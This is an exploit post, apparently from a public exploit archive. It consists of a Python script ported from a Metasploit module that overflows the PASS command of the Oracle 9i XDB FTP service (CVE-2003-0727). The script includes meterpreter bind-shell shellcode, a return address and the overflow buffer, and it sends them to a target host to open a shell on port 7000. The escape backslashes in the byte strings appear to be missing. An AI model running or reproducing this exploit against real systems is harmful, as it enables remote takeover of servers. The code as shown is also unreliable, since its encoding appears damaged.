Oracle 9i XDB FTP Pass Overflow
Posted on 03 February 2016
''' Oracle 9i XDB FTP PASS Overflow (win32) Ported to python from the Metasploit oracle9i_xdb_ftp_pass.rb exploit Original exploit: Description from original exploit: By passing an overly long string to the PASS command, a stack based buffer overflow occurs. David Litchfield, has illustrated multiple vulnerabilities in the Oracle 9i XML Database (XDB), during a seminar on "Variations in exploit methods between Linux and Windows" presented at the Blackhat conference. CVE: 2003-0727 OSVDB: 2449 BID: 8375 Date: 2/2/2016 Ported by: Tom Ryans Tested on: Win 2000 SP4 Usage: target_ip target_port ex. 2100 Spawns meterpreter bind shell on port 7000. ''' #!/usr/bin/python import sys, socket if len(sys.argv) != 3: print "Usage: %s target_ip target_port" % sys.argv[0] sys.exit() host = str(sys.argv[1]) port = int(sys.argv[2]) #msfvenom -p windows/meterpreter/bind_tcp lport=7000 EXITFUNC=thread -b "x00x09x0ax0dx20x22x25x26x27x2bx2fx3ax3cx3ex3fx40" -f c shellcode = ( "xdbxc8xd9x74x24xf4x5bx31xc9xb1x4bxbdxe8xe3x74" "x4ex83xc3x04x31x6bx16x03x6bx16xe2x1dx1fx9cxcc" "xddxe0x5dxb1x54x05x6cxf1x02x4dxdfxc1x41x03xec" "xaax07xb0x67xdex8fxb7xc0x55xe9xf6xd1xc6xc9x99" "x51x15x1dx7ax6bxd6x50x7bxacx0bx98x29x65x47x0e" "xdex02x1dx92x55x58xb3x92x8ax29xb2xb3x1cx21xed" "x13x9exe6x85x1axb8xebxa0xd5x33xdfx5fxe4x95x11" "x9fx4axd8x9dx52x93x1cx19x8dxe6x54x59x30xf0xa2" "x23xeex75x31x83x65x2dx9dx35xa9xabx56x39x06xb8" "x31x5ex99x6dx4ax5ax12x90x9dxeax60xb6x39xb6x33" "xd7x18x12x95xe8x7bxfdx4ax4cxf7x10x9exfdx5ax7d" "x53xcfx64x7dxfbx58x16x4fxa4xf2xb0xe3x2dxdcx47" "x03x04x98xd8xfaxa7xd8xf1x38xf3x88x69xe8x7cx43" "x6ax15xa9xf9x61xb0x02x1fx88x28xa2xb5x71xc5x4e" "x46xa9xf5x70x8dxc2x9ex8cx2dxf6x06x18xcbx62xa7" "x4cx44x1bx05xabx5dxbcx76x99x24x82xfcx7ax71x6b" "x48x93x45x94x49xb1xe2x02xc2xd6x37x32xd5xf2x10" "x23x42x88xf0x06xf2x8dxd9xf3xf4x1bxe5x55xa2xb3" "xe7x80x84x1bx18xe7x96x5cxe6x76xb4x17xd0xecx86" "x4fx1cxe1x06x90x4ax6bx07xf8x2axcfx54x1dx35xda" "xc8x8exa3xe5xb8x63x64x8ex46x5dx42x11xb8x88xd1" "x56x46x4dxd2xa7x84x98x1axd2xe3x18") user = "A" * 10 # return address from Metasploit module: 0x60616d46 oraclient9.dll (pop/pop/ret) ret = "x46x6dx61x60" prependencoder = "x81xc4xffxefxffxffx44" #from Metasploit module nops = "x90" * (800 - len(shellcode) - len(prependencoder)) buff = "A" * 442 + "xebx06x90x90" + ret + nops + prependencoder + shellcode print " ++++++++++++++++++++++++++++++++++++++++++++" print " + Oracle 9i XDB FTP PASS Overflow exploit +" print " +++++++++++++++++++++++++++++++++++++++++++++" s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((host,port)) print s.recv(1024) print "Sending %s size payload..." % len(buff) s.send("USER " + user + " ") s.send("PASS " + buff + " ") print "Payload sent...." print "Check port 7000 for meterpreter shell..." s.close()